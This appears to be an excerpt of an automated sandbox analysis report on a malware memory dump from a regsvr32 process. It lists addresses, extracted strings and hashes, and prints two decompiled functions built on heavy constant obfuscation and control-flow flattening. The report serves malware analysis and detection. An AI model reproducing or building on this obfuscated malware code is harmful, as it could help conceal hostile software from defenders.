0x04b97921
0x04b97927
0x04b97516
0x00000000
0x04b97516
0x04b97569
0x04b975b6
0x04b975bb
0x04b975c2
0x04b975c7
0x04b975d0
0x04b975d5
0x00000000
0x04b975d5
0x04b97563
0x04b97556
0x04b9754a
0x04b9753e
0x04b97532
0x04b97945
0x04b97951
0x04b97951
0x04b976b5
0x04b976b7
0x04b97772
0x04b97775
0x04b977a6
0x04b97777
0x04b97777
0x04b97783
0x04b9778a
0x04b97795
0x04b9779a
0x04b9779d
0x04b9779d
0x04b977e6
0x04b977ed
0x04b977ed
0x04b977ef
0x04b977f1
0x04b977f1
0x04b97841
0x04b97858
0x04b9785d
0x04b97860
0x04b97862
0x04b97910
0x00000000
0x04b97868
0x04b9788b
0x04b97892
0x04b97897
0x04b9789a
0x04b9789c
0x04b978c6
0x04b978d6
0x04b978d6
0x04b978d6
0x04b978fe
0x04b97903
0x04b97903
0x04b97906
0x00000000
0x04b97906
0x04b976bd
0x04b976bd
0x04b976c3
0x04b97763
0x04b9776a
0x00000000
0x04b976c9
0x04b976c9
0x04b976cf
0x04b9793e
0x04b976d5
0x04b976d5
0x04b976db
0x04b976f3
0x04b976f5
0x04b976f7
0x04b97705
0x04b97705
0x04b976f9
0x04b97700
0x04b97700
0x04b97707
0x04b9772c
0x04b97731
0x04b97736
0x04b9773e
0x00000000
0x04b976dd
0x04b976dd
0x04b976e3
0x00000000
0x04b976e9
0x04b976e9
0x00000000
0x04b976e9
0x04b976e3
0x04b976db
0x04b976cf
0x04b976c3
0x00000000
0x04b976b7
0x04b97516

Strings

OHR, xrefs: 04B97171
&B, xrefs: 04B96E80
LG, xrefs: 04B96892
H#, xrefs: 04B973B6
R<, xrefs: 04B96DC0
n3u, xrefs: 04B9692C
)fVX, xrefs: 04B968B3
OI, xrefs: 04B97058
!, xrefs: 04B9747A
c', xrefs: 04B96EF2
2 ], xrefs: 04B972F0
=o, xrefs: 04B96F70
^, xrefs: 04B9706B

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
API String ID: 0-4090907037
Opcode ID: eba80808453263df5f27038cd013116d9248fd3c377cffe72ed8f60f47927783
Instruction ID: aeb374b547970506d4b100654430c600659ff3d9d8140a1189b106fa0df7c7ba
Opcode Fuzzy Hash: eba80808453263df5f27038cd013116d9248fd3c377cffe72ed8f60f47927783
Instruction Fuzzy Hash: 23921EB1509381CFE7B9CF25C54AA8BBBE1FBC4308F10891DE1D996260D7B59949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04B9A474, Relevance: 15.4, Strings: 12, Instructions: 357
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B9A474(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t422;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				void* _t487;
				void* _t488;
				signed int* _t492;

				_t492 =  &_v2792;
				_t487 = __ecx;
				_v2736 = 0xa43fec;
				_v2736 = _v2736 + 0xffff66c9;
				_v2736 = _v2736 >> 0xc;
				_v2736 = _v2736 ^ 0x00000a13;
				_v2788 = 0xca245c;
				_v2788 = _v2788 + 0xc295;
				_v2788 = _v2788 << 6;
				_v2788 = _v2788 + 0xffff0e49;
				_v2788 = _v2788 ^ 0x32b58b6e;
				_v2660 = 0x35f9ef;
				_v2660 = _v2660 << 0xe;
				_v2660 = _v2660 ^ 0x7e7543bd;
				_v2688 = 0x437073;
				_v2688 = _v2688 >> 0xe;
				_v2688 = _v2688 ^ 0xf2a4f008;
				_v2688 = _v2688 ^ 0xf2aac2be;
				_v2700 = 0x2c6eea;
				_v2700 = _v2700 >> 1;
				_v2700 = _v2700 | 0x2b7eca56;
				_v2700 = _v2700 ^ 0x2b78a774;
				_v2676 = 0xafd7a5;
				_v2676 = _v2676 >> 0xb;
				_v2676 = _v2676 ^ 0x0002223f;
				_v2740 = 0x8278b2;
				_v2740 = _v2740 << 6;
				_v2740 = _v2740 << 1;
				_v2740 = _v2740 ^ 0x4136a23a;
				_v2612 = 0x7f4f91;
				_v2612 = _v2612 + 0xffff9116;
				_v2612 = _v2612 ^ 0x007102c2;
				_v2668 = 0x4461fd;
				_v2668 = _v2668 * 0x27;
				_v2668 = _v2668 ^ 0x0a629f7c;
				_t488 = 0x219adc7;
				_v2756 = 0xa77258;
				_v2756 = _v2756 >> 2;
				_v2756 = _v2756 + 0x9d81;
				_t444 = 0x54;
				_v2756 = _v2756 * 0x70;
				_v2756 = _v2756 ^ 0x12998c8c;
				_v2628 = 0x3fd810;
				_v2628 = _v2628 + 0xfffff92f;
				_v2628 = _v2628 ^ 0x003ee59a;
				_v2780 = 0x9fe7be;
				_v2780 = _v2780 + 0xaec4;
				_v2780 = _v2780 << 0x10;
				_v2780 = _v2780 >> 2;
				_v2780 = _v2780 ^ 0x25a64a78;
				_v2620 = 0xbf1dbc;
				_v2620 = _v2620 + 0xffff98cb;
				_v2620 = _v2620 ^ 0x00bd158d;
				_v2732 = 0xa8760d;
				_v2732 = _v2732 << 8;
				_v2732 = _v2732 + 0xa9d7;
				_v2732 = _v2732 ^ 0xa87dd804;
				_v2684 = 0xb5ab85;
				_v2684 = _v2684 / _t444;
				_v2684 = _v2684 ^ 0x0004fa7b;
				_v2708 = 0x9eabf6;
				_t445 = 0x4f;
				_v2708 = _v2708 / _t445;
				_v2708 = _v2708 ^ 0xed59372e;
				_v2708 = _v2708 ^ 0xed517486;
				_v2608 = 0x5ae525;
				_v2608 = _v2608 * 0x4c;
				_v2608 = _v2608 ^ 0x1afb43af;
				_v2644 = 0xaf8ee5;
				_v2644 = _v2644 ^ 0xf4d3cb8d;
				_v2644 = _v2644 ^ 0xf47b6f68;
				_v2604 = 0xc38975;
				_v2604 = _v2604 >> 0xf;
				_v2604 = _v2604 ^ 0x000b5702;
				_v2652 = 0x27ffed;
				_v2652 = _v2652 + 0x9a12;
				_v2652 = _v2652 ^ 0x002af41d;
				_v2616 = 0x7935fe;
				_v2616 = _v2616 + 0x1306;
				_v2616 = _v2616 ^ 0x007d2870;
				_v2692 = 0x7d1b3a;
				_t446 = 0x7d;
				_v2692 = _v2692 * 0x5a;
				_v2692 = _v2692 * 0x29;
				_v2692 = _v2692 ^ 0x0b423dcb;
				_v2724 = 0xbe8a04;
				_v2724 = _v2724 * 0x27;
				_v2724 = _v2724 | 0x44bf91fe;
				_v2724 = _v2724 ^ 0x5dbe7768;
				_v2636 = 0x66ae7e;
				_v2636 = _v2636 + 0xffff18a5;
				_v2636 = _v2636 ^ 0x006a6401;
				_v2744 = 0x24afb7;
				_v2744 = _v2744 + 0xf221;
				_v2744 = _v2744 >> 2;
				_v2744 = _v2744 ^ 0x00088a95;
				_v2716 = 0x4884b4;
				_v2716 = _v2716 | 0xbbb03a66;
				_v2716 = _v2716 ^ 0xe76b33e5;
				_v2716 = _v2716 ^ 0x5c9d38b7;
				_v2672 = 0xd2ae7f;
				_v2672 = _v2672 / _t446;
				_v2672 = _v2672 ^ 0x00034be9;
				_v2680 = 0x28809f;
				_v2680 = _v2680 << 8;
				_v2680 = _v2680 ^ 0x28858fb3;
				_v2720 = 0x2529a6;
				_t447 = 0x60;
				_v2720 = _v2720 / _t447;
				_t448 = 0x55;
				_v2720 = _v2720 / _t448;
				_v2720 = _v2720 ^ 0x00015f05;
				_v2728 = 0xe4ec68;
				_v2728 = _v2728 | 0x076980de;
				_v2728 = _v2728 >> 0x10;
				_v2728 = _v2728 ^ 0x00066f44;
				_v2764 = 0x25662b;
				_v2764 = _v2764 + 0x352e;
				_v2764 = _v2764 + 0xd238;
				_v2764 = _v2764 >> 9;
				_v2764 = _v2764 ^ 0x0003808d;
				_v2696 = 0xd79a4d;
				_v2696 = _v2696 >> 0xf;
				_v2696 = _v2696 | 0xe296257b;
				_v2696 = _v2696 ^ 0xe2941eeb;
				_v2704 = 0x8f07c6;
				_v2704 = _v2704 << 6;
				_v2704 = _v2704 << 0xb;
				_v2704 = _v2704 ^ 0x0f8cdb18;
				_v2772 = 0x165ad0;
				_v2772 = _v2772 * 0x45;
				_v2772 = _v2772 * 0xe;
				_v2772 = _v2772 | 0xc27a990b;
				_v2772 = _v2772 ^ 0xd67b0e5a;
				_v2712 = 0x3a0787;
				_v2712 = _v2712 << 9;
				_v2712 = _v2712 << 3;
				_v2712 = _v2712 ^ 0xa0756bb8;
				_v2768 = 0xd1f7d1;
				_v2768 = _v2768 ^ 0x28b4518a;
				_v2768 = _v2768 ^ 0x2c50bf5e;
				_v2768 = _v2768 << 1;
				_v2768 = _v2768 ^ 0x086bcac7;
				_v2664 = 0x43880;
				_v2664 = _v2664 << 2;
				_v2664 = _v2664 ^ 0x001745f4;
				_v2776 = 0x99bfba;
				_v2776 = _v2776 + 0xb20b;
				_v2776 = _v2776 ^ 0x9325107f;
				_v2776 = _v2776 ^ 0x1bb55bce;
				_v2776 = _v2776 ^ 0x880f35ab;
				_v2784 = 0xcf6f67;
				_v2784 = _v2784 | 0xe7eb8da5;
				_t449 = 0x69;
				_v2784 = _v2784 * 5;
				_v2784 = _v2784 >> 0xc;
				_v2784 = _v2784 ^ 0x000ae4cd;
				_v2792 = 0x938e6a;
				_v2792 = _v2792 * 0x34;
				_v2792 = _v2792 + 0xd82d;
				_v2792 = _v2792 + 0xffff3001;
				_v2792 = _v2792 ^ 0x1dfcfd52;
				_v2640 = 0x59feb;
				_v2640 = _v2640 + 0xffffbab8;
				_v2640 = _v2640 ^ 0x000de14c;
				_v2760 = 0x4f2f51;
				_v2760 = _v2760 << 3;
				_v2760 = _v2760 | 0xca7d0b31;
				_v2760 = _v2760 >> 5;
				_v2760 = _v2760 ^ 0x06504f0f;
				_v2648 = 0x12de1c;
				_v2648 = _v2648 << 2;
				_v2648 = _v2648 ^ 0x0044c65b;
				_v2656 = 0xedb7d1;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x00060f5a;
				_v2624 = 0x25ed17;
				_v2624 = _v2624 << 8;
				_v2624 = _v2624 ^ 0x25e602f4;
				_v2632 = 0xdb105d;
				_v2632 = _v2632 + 0xbf07;
				_v2632 = _v2632 ^ 0x00d56ea2;
				_v2752 = 0xdb9922;
				_v2752 = _v2752 + 0xffff5c98;
				_t422 = _v2752 / _t449;
				_v2752 = _t422;
				_v2752 = _v2752 + 0xe0a7;
				_v2752 = _v2752 ^ 0x000f564b;
				_v2748 = 0x373105;
				_v2748 = _v2748 + 0xffff8875;
				_v2748 = _v2748 | 0xab9c3c2b;
				_v2748 = _v2748 ^ 0xabbdde7d;
				while(_t488 != 0x219adc7) {
					if(_t488 == 0x472b880) {
						E04B81A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
						_push(_v2712);
						_push(_v2772);
						_push(_v2704);
						E04BA2D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0x4b8192c,  &_v520,  &_v1040, E04B9E1F8(0x4b8192c, _v2696, __eflags));
						E04B9FECB(_t424, _v2640, _v2760, _v2648, _v2656);
						__eflags = 0;
						return E04B985FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
					}
					_t500 = _t488 - 0x6430241;
					if(_t488 != 0x6430241) {
						L7:
						__eflags = _t488 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t422;
						}
						L10:
						return _t422;
					}
					E04BA0DB1(_v2788,  &_v2600, _t500, _v2660, _t449, _v2688);
					 *((short*)(E04B909DD(_v2700,  &_v2600, _v2676, _v2740))) = 0;
					E04B8BAA9(_v2612, _v2668, _t500, _v2756, _v2628,  &_v1560);
					_push(_v2684);
					_push(_v2732);
					_push(_v2620);
					E04BA2D0A(_v2608, _t500,  &_v1560, _v2644, _v2604, _v2652, 0x4b8188c,  &_v2080,  &_v2600, E04B9E1F8(0x4b8188c, _v2780, _t500));
					E04B9FECB(_t436, _v2616, _v2692, _v2724, _v2636);
					_t449 = _v2744;
					_t422 = E04B8BFBE( &_v2080, _t487, _v2716);
					_t492 =  &(_t492[0x18]);
					if(_t422 != 0) {
						_t488 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t488 = 0x6430241;
				goto L7;
			}

0x04b9a474
0x04b9a47e
0x04b9a480
0x04b9a48a
0x04b9a492
0x04b9a497
0x04b9a49f
0x04b9a4a7
0x04b9a4af
0x04b9a4b4
0x04b9a4bc
0x04b9a4c4
0x04b9a4cf
0x04b9a4d7
0x04b9a4e2
0x04b9a4ea
0x04b9a4ef
0x04b9a4f7
0x04b9a4ff
0x04b9a507
0x04b9a50b
0x04b9a513
0x04b9a51b
0x04b9a526
0x04b9a52e
0x04b9a539
0x04b9a541
0x04b9a546
0x04b9a54a
0x04b9a552
0x04b9a55d
0x04b9a568
0x04b9a573
0x04b9a586
0x04b9a58d
0x04b9a598
0x04b9a59d
0x04b9a5a5
0x04b9a5aa
0x04b9a5b9
0x04b9a5bc
0x04b9a5c0
0x04b9a5c8
0x04b9a5d3
0x04b9a5de
0x04b9a5e9
0x04b9a5f1
0x04b9a5f9
0x04b9a5fe
0x04b9a603
0x04b9a60b
0x04b9a616
0x04b9a621
0x04b9a62c
0x04b9a634
0x04b9a639
0x04b9a641
0x04b9a649
0x04b9a65f
0x04b9a666
0x04b9a671
0x04b9a67d
0x04b9a680
0x04b9a684
0x04b9a68c
0x04b9a694
0x04b9a6a7
0x04b9a6ae
0x04b9a6bb
0x04b9a6c6
0x04b9a6d1
0x04b9a6dc
0x04b9a6e7
0x04b9a6ef
0x04b9a6fa
0x04b9a705
0x04b9a710
0x04b9a71b
0x04b9a726
0x04b9a731
0x04b9a73c
0x04b9a74b
0x04b9a74e
0x04b9a757
0x04b9a75b
0x04b9a763
0x04b9a770
0x04b9a774
0x04b9a77c
0x04b9a784
0x04b9a78f
0x04b9a79a
0x04b9a7a5
0x04b9a7ad
0x04b9a7b5
0x04b9a7ba
0x04b9a7c2
0x04b9a7ca
0x04b9a7d2
0x04b9a7da
0x04b9a7e2
0x04b9a7f8
0x04b9a7ff
0x04b9a80a
0x04b9a815
0x04b9a81d
0x04b9a828
0x04b9a834
0x04b9a839
0x04b9a843
0x04b9a846
0x04b9a84a
0x04b9a852
0x04b9a85a
0x04b9a862
0x04b9a867
0x04b9a86f
0x04b9a877
0x04b9a87f
0x04b9a887
0x04b9a88c
0x04b9a894
0x04b9a89c
0x04b9a8a1
0x04b9a8a9
0x04b9a8b1
0x04b9a8b9
0x04b9a8be
0x04b9a8c3
0x04b9a8cb
0x04b9a8d8
0x04b9a8e1
0x04b9a8e7
0x04b9a8f4
0x04b9a901
0x04b9a909
0x04b9a90e
0x04b9a913
0x04b9a91b
0x04b9a923
0x04b9a92b
0x04b9a933
0x04b9a937
0x04b9a93f
0x04b9a94a
0x04b9a952
0x04b9a95d
0x04b9a965
0x04b9a96d
0x04b9a975
0x04b9a97d
0x04b9a985
0x04b9a98d
0x04b9a99c
0x04b9a99d
0x04b9a9a1
0x04b9a9a6
0x04b9a9ae
0x04b9a9bb
0x04b9a9bf
0x04b9a9c7
0x04b9a9cf
0x04b9a9d7
0x04b9a9e2
0x04b9a9ed
0x04b9a9f8
0x04b9aa00
0x04b9aa05
0x04b9aa0d
0x04b9aa12
0x04b9aa1a
0x04b9aa25
0x04b9aa2d
0x04b9aa38
0x04b9aa43
0x04b9aa4b
0x04b9aa56
0x04b9aa61
0x04b9aa69
0x04b9aa74
0x04b9aa7f
0x04b9aa8a
0x04b9aa95
0x04b9aa9d
0x04b9aaa9
0x04b9aaab
0x04b9aaaf
0x04b9aab7
0x04b9aabf
0x04b9aac7
0x04b9aacf
0x04b9aad7
0x04b9aadf
0x04b9aaed
0x04b9ac4c
0x04b9ac51
0x04b9ac5d
0x04b9ac61
0x04b9acaa
0x04b9acca
0x04b9acd9
0x00000000
0x04b9acfa
0x04b9aaf3
0x04b9aaf5
0x04b9ac13
0x04b9ac13
0x04b9ac19
0x00000000
0x00000000
0x00000000
0x00000000
0x04b9ad07
0x04b9ad07
0x04b9ad07
0x04b9ab12
0x04b9ab37
0x04b9ab5b
0x04b9ab60
0x04b9ab6c
0x04b9ab70
0x04b9abc2
0x04b9abe2
0x04b9abee
0x04b9abfa
0x04b9abff
0x04b9ac04
0x04b9ac0a
0x00000000
0x04b9ac0a
0x00000000
0x04b9ac04
0x04b9ac11
0x00000000

Strings

%Z, xrefs: 04B9A694
$P, xrefs: 04B9A47C
h, xrefs: 04B9A852
n,, xrefs: 04B9A4FF
.5, xrefs: 04B9A877
3k, xrefs: 04B9A7D2
Q/O, xrefs: 04B9A9F8
L, xrefs: 04B9A9ED
+f%, xrefs: 04B9A86F
p(}, xrefs: 04B9A731
.7Y, xrefs: 04B9A684
spC, xrefs: 04B9A4E2

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$%Z$+f%$.5$.7Y$L$Q/O$h$p(}$spC$3k$n,
API String ID: 0-500290626
Opcode ID: 4e0ba21f4d4c436ad08938e8862632790426a6c8663f8d2bb2ab95b4e5932e1b
Instruction ID: 13cee0c44e23cc7254989320e307fe9bd3aba9cc846906b4d337827335d1c1e5
Opcode Fuzzy Hash: 4e0ba21f4d4c436ad08938e8862632790426a6c8663f8d2bb2ab95b4e5932e1b
Instruction Fuzzy Hash: 8412F3714093809FE7A9CF60C989A8BFBE1FBC4348F108A1DE1D996260D7B59949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 04B9D1BC, Relevance: 15.3, Strings: 12, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E04B9D1BC(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				void* _t309;
				void* _t322;
				intOrPtr _t325;
				intOrPtr _t328;
				intOrPtr _t332;
				void* _t336;
				intOrPtr _t338;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t343;
				intOrPtr _t346;
				void* _t349;
				intOrPtr _t364;
				intOrPtr _t365;
				void* _t382;
				intOrPtr _t385;
				void* _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				intOrPtr _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_push(_a24);
				_t395 = __edx;
				_push(_a20);
				_v288 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B9FE29(__ecx);
				_v312 = 0xeda4ef;
				_t397 = _t396 + 0x20;
				_v312 = _v312 + 0x7c87;
				_v312 = _v312 ^ 0x00e6bc42;
				_t346 = 0;
				_v356 = 0x83a7cc;
				_t349 = 0x902256d;
				_v356 = _v356 << 0xd;
				_v356 = _v356 | 0xd496e6a5;
				_v356 = _v356 ^ 0xf4f8676c;
				_v388 = 0x254bab;
				_v388 = _v388 | 0x2708e00f;
				_v388 = _v388 << 0xc;
				_v388 = _v388 << 0xa;
				_v388 = _v388 ^ 0xebca5aa3;
				_v376 = 0x3a43eb;
				_v376 = _v376 + 0x5e30;
				_v376 = _v376 ^ 0x2d5dec97;
				_v376 = _v376 ^ 0x2d6492cf;
				_v324 = 0x965e68;
				_v324 = _v324 ^ 0x4fad172c;
				_v324 = _v324 ^ 0x4f30eea0;
				_v404 = 0x95ea8f;
				_t391 = 0x3c;
				_v404 = _v404 / _t391;
				_v404 = _v404 << 0xc;
				_v404 = _v404 | 0x93230375;
				_v404 = _v404 ^ 0xb7f3bbc9;
				_v296 = 0x950835;
				_v296 = _v296 + 0xffff217e;
				_v296 = _v296 ^ 0x0090010d;
				_v412 = 0x146e3b;
				_v412 = _v412 ^ 0xfee339d3;
				_v412 = _v412 | 0x08dab50c;
				_v412 = _v412 << 5;
				_v412 = _v412 ^ 0xdff21b2d;
				_v316 = 0x73cd3;
				_v316 = _v316 << 0xb;
				_v316 = _v316 ^ 0x39e53ce3;
				_v304 = 0x17d1c9;
				_v304 = _v304 | 0x32076b61;
				_v304 = _v304 ^ 0x32193df4;
				_v400 = 0xe22ffc;
				_v400 = _v400 * 0xf;
				_v400 = _v400 << 8;
				_v400 = _v400 >> 5;
				_v400 = _v400 ^ 0x020db90e;
				_v360 = 0x4e823d;
				_v360 = _v360 >> 7;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0x000f4c82;
				_v332 = 0x37cdc;
				_v332 = _v332 >> 0xe;
				_v332 = _v332 ^ 0x000cfe6d;
				_v392 = 0x36521e;
				_v392 = _v392 << 2;
				_v392 = _v392 ^ 0x01f25d84;
				_v392 = _v392 + 0xffff6602;
				_v392 = _v392 ^ 0x0122fac3;
				_v292 = 0x811559;
				_v292 = _v292 ^ 0x63e4ed2d;
				_v292 = _v292 ^ 0x636b0aa2;
				_v408 = 0xc9a98b;
				_v408 = _v408 ^ 0x273a7ab7;
				_t392 = 0x3d;
				_v408 = _v408 / _t392;
				_v408 = _v408 | 0xd16a0a28;
				_v408 = _v408 ^ 0xd1e35630;
				_v352 = 0x4de238;
				_v352 = _v352 ^ 0xe481f79a;
				_v352 = _v352 ^ 0xe4c0c54b;
				_v340 = 0x7e756a;
				_v340 = _v340 << 0xb;
				_v340 = _v340 ^ 0xf3ae0159;
				_v384 = 0x3029be;
				_v384 = _v384 + 0x835e;
				_v384 = _v384 ^ 0x9e5eea44;
				_v384 = _v384 ^ 0x9e65521f;
				_v364 = 0xcf8251;
				_v364 = _v364 + 0xffff400c;
				_t393 = 0x78;
				_v364 = _v364 * 0x5a;
				_v364 = _v364 ^ 0x48b0c21e;
				_v320 = 0x2b8f03;
				_v320 = _v320 << 7;
				_v320 = _v320 ^ 0x15cafa02;
				_v372 = 0xb0a86a;
				_v372 = _v372 ^ 0x35b8bfe6;
				_v372 = _v372 ^ 0xed8d6bf1;
				_v372 = _v372 ^ 0xd88344ec;
				_v344 = 0x8c38;
				_v344 = _v344 ^ 0x1ac013b0;
				_v344 = _v344 ^ 0x1ac5368a;
				_v348 = 0x2c1ac3;
				_v348 = _v348 >> 6;
				_v348 = _v348 ^ 0x0005c30d;
				_v300 = 0x3ae4ba;
				_v300 = _v300 >> 0xe;
				_v300 = _v300 ^ 0x00012364;
				_v396 = 0xe1901;
				_v396 = _v396 << 0xe;
				_v396 = _v396 + 0x39a8;
				_v396 = _v396 ^ 0x864e7189;
				_v368 = 0xe5c11e;
				_t394 = _v288;
				_v368 = _v368 / _t393;
				_v368 = _v368 | 0x7320cec6;
				_v368 = _v368 ^ 0x73273aba;
				_v336 = 0xf33546;
				_v336 = _v336 ^ 0x37961faf;
				_v336 = _v336 ^ 0x37663e0b;
				_v328 = 0x922129;
				_v328 = _v328 | 0xf90cd049;
				_v328 = _v328 ^ 0xf99851f2;
				_v416 = 0x9fd52c;
				_v416 = _v416 << 2;
				_v416 = _v416 * 0x22;
				_v416 = _v416 + 0xffff9e7e;
				_v416 = _v416 ^ 0x54e779e0;
				_v380 = 0x615361;
				_v380 = _v380 >> 1;
				_v380 = _v380 + 0x673e;
				_v380 = _v380 ^ 0x003e049c;
				_v308 = 0x9da5c1;
				_v308 = _v308 + 0xf72;
				_v308 = _v308 ^ 0x009db133;
				while(1) {
					L1:
					_t309 = 0xe35a561;
					do {
						while(1) {
							L2:
							_t399 = _t349 - 0x8816d6a;
							if(_t399 > 0) {
								break;
							}
							if(_t399 == 0) {
								_t325 =  *0x4ba6228; // 0x0
								_t328 =  *0x4ba6228; // 0x0
								_t332 =  *0x4ba6228; // 0x0
								_t336 = E04B967E6(_t394, _v400, _v360, _v332, _v392,  &_v268,  *( *((intOrPtr*)(_t332 + 4)) + 0x14) & 0x0000ffff, _v292,  &_v276,  *( *((intOrPtr*)(_t328 + 4)) + 0x44) & 0x0000ffff, _v408,  *((intOrPtr*)(_t325 + 4)) + 0x20, _v352,  &_v260);
								_t397 = _t397 + 0x30;
								if(_t336 == 0) {
									L25:
									_t349 = 0xc732dcb;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								} else {
									_t349 = 0x772d3d2;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								}
							} else {
								if(_t349 == 0x200f7b2) {
									if(_v280 >= _v308) {
										_t338 = E04B92E5D( &_v284,  &_v276);
									} else {
										_t338 = E04B880C0( &_v284);
									}
									_t394 = _t338;
									_t309 = 0xe35a561;
									_t349 =  !=  ? 0xe35a561 : 0xc732dcb;
									continue;
								} else {
									if(_t349 == 0x323c58a) {
										_t364 =  *0x4ba6228; // 0x0
										_t340 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)) + 0x18));
										 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t364 + 0x1c)) + 1;
										_t385 =  *((intOrPtr*)(_t364 + 0x1c));
										 *((intOrPtr*)(_t364 + 4)) = _t340;
										if(_t340 == 0) {
											 *((intOrPtr*)(_t364 + 4)) =  *((intOrPtr*)(_t364 + 0x14));
										}
										_t341 =  *0x4ba6228; // 0x0
										if(_t385 >=  *((intOrPtr*)(_t341 + 0x18))) {
											_t365 =  *0x4ba6228; // 0x0
											 *(_t365 + 0x1c) =  *(_t365 + 0x1c) & 0x00000000;
										} else {
											_t349 = 0x902256d;
											while(1) {
												L1:
												_t309 = 0xe35a561;
												goto L2;
											}
										}
									} else {
										if(_t349 == 0x54cb160) {
											_t343 = E04B95779( &_v284, _t395, _v388, _v376, _v288);
											_t397 = _t397 + 0xc;
											if(_t343 != 0) {
												_t349 = 0x200f7b2;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										} else {
											if(_t349 != 0x772d3d2) {
												goto L35;
											} else {
												if(E04B86B7A(_v340, _a16, _v384,  &_v268) == 0) {
													_t390 = 0x323c58a;
												} else {
													_t390 = 0x72c7f38;
													_t346 = 1;
												}
												_t349 = 0x939e27d;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										}
									}
								}
							}
							L38:
							return _t346;
						}
						if(_t349 == 0x902256d) {
							_t394 = 0;
							E04B9FE2A(_v312, _v356, 0x100,  &_v260);
							_v276 = 0;
							_t349 = 0x54cb160;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t349 == 0x939e27d) {
								E04BA2B09(_v364, _v268, _v320, _v372);
								goto L25;
							} else {
								if(_t349 == 0xc732dcb) {
									E04BA2B09(_v344, _v284, _v348, _v300);
									E04BA2B09(_v396, _t394, _v368, _v336);
									E04BA2B09(_v328, _v276, _v416, _v380);
									_t397 = _t397 + 0x18;
									_t349 = _t390;
									L34:
									_t309 = 0xe35a561;
									goto L35;
								} else {
									if(_t349 != _t309) {
										goto L35;
									} else {
										_push(_t349);
										_push(_t349);
										_t322 = E04B9CCA0(1, 0x40);
										_push( &_v260);
										_push(_t322);
										_push(_v304);
										_t382 = 0xb;
										E04B8E404(_v316, _t382);
										_t397 = _t397 + 0x1c;
										_t349 = 0x8816d6a;
										goto L1;
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t349 != 0x72c7f38);
					goto L38;
				}
			}

0x04b9d1c6
0x04b9d1cd
0x04b9d1d1
0x04b9d1d8
0x04b9d1df
0x04b9d1e6
0x04b9d1ed
0x04b9d1f4
